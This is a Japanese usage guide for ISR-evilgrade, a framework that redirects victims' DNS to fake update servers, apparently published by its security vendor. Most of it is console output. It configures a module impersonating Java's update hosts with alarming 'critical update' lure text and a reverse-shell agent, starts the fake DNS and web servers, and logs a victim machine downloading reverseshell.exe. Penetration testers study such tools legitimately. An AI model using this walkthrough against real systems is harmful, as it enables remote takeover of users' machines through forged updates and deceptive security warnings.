
Evilgradeは、脆弱なアップグレード実装を悪用して偽のアップデートを注入できるモジュラーフレームワークです。
Faraday Security Research -- | ISR-evilgrade | www.faradaysec.com | --
Evilgradeは、モジュール式フレームワークであり、ユーザーが偽のアップデートを注入することで、貧弱なアップグレード実装を悪用することを可能にします。 事前に作成されたバイナリ(エージェント)、高速なペンテストのための動作するデフォルト設定が付属しており、独自のWebサーバーおよびDNSサーバーモジュールを持っています。 新しい設定のセットアップが容易で、新しいバイナリエージェントが設定されると自動設定機能があります。
このフレームワークは、攻撃者がホスト名のリダイレクト(被害者のDNSトラフィックの操作)を行える場合に使用されます。これは以下の2つのシナリオで実行できます。
Evilgradeはモジュールで動作します。各モジュールには、特定のアプリケーション/システムの偽のアップデートをエミュレートするために必要な実装構造があります。
ISR-Evilgradeはクロスプラットフォームであり、適切なターゲットプラットフォームに適したペイロードを用意することだけが必要です。
これはIOSコンソールと同様に動作します。``` evilgrade>help Type 'help command' for more detailed help on a command. Commands: configure - Configure - no help available exit - exits the program help - prints this screen, or help on 'command' reload - Reload to update all the modules - no help available restart - Restart webserver - no help available set - Configure variables - no help available show - Display information of . start - Start webserver - no help available status - Get webserver status - no help available stop - Stop webserver - no help available version - Display framework version. - no help available
Object: options - Show options of current module. vhosts - Show VirtualHosts of current module. modules - List all modules available for use. active - Show active modules.
## 実装済みモジュール一覧``` console
evilgrade>show modules
List of modules:
===============
...
...
...
- 63 modules available.
evilgrade>conf sunjava evilgrade(sunjava)>
#### 全てのVirtualHostを表示します。
#### VirtualHostフィールドには、Webサーバーがエミュレートするドメインが含まれます。``` console
evilgrade>show vhosts
Virtual hosts:
=============
[
"java.sun.com",
"javadl-esd.sun.com",
...
...
...
]
evilgrade(sunjava)>show options
Name = Sun Microsystems Java Version = 2.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "java.sun.com|javadl-esd.sun.com"
.-------------------------------------------------------------------------------------------------------------------------. | Name | Default | Description | +--------------+-------------------------------------------------+--------------------------------------------------------+ | website | http://java.com/moreinfolink | Website displayed in the update | | enable | 1 | Status | | atitle | Critical vulnerability | Title name to be displayed in the systray item popup | | arg | | Arg passed to Agent | | adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup | | description | This critical update fix internal vulnerability | Description to be displayed during the update | | agent | ./agent/reverseshellsign.exe | Agent to inject | | title | Critical update | Title name displayed in the update | '--------------+-------------------------------------------------+--------------------------------------------------------'
#### サービスを開始 (DNS Server と WebServer)``` console
evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
#### Waiting for victims
evilgrade>
[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"
evilgrade>
[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"
evilgrade>
[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"
evilgrade>
[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"
evilgrade>show status Webserver (pid 4134) already running
.---------------------------------------------------------------------------------------------------------------. | Client | Module | Status | Md5,Cmd,File | +----------------+------------------+--------+------------------------------------------------------------------+ | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | '----------------+------------------+--------+------------------------------------------------------------------'
## .:: [詳細な使用方法] ::.
### コマンド
#### configure / conf - <module-name>の設定
例:
-------``` console
evilgrade>configure sunjava
evilgrade(sunjava)>
evilgrade>conf sunjava
evilgrade(sunjava)>
## 'conf' takes us back to the global configuration
evilgrade(sunjava)>conf
evilgrade>
##
reload - Reload to get all modules update (to refresh loaded modules, useful on development)
start - Start webserver
stop - Stop webserver (fake update server)
例: -------``` console evilgrade>start evilgrade> [28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ... evilgrade> [28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
#######################################
evilgrade>stop Stopping WEBSERVER [OK] Stopping DNSSERVER [OK]
#######################################
restart - Restart services (WebServer and DNS Server) stops and starts again
#######################################
status - Get webserver and victims status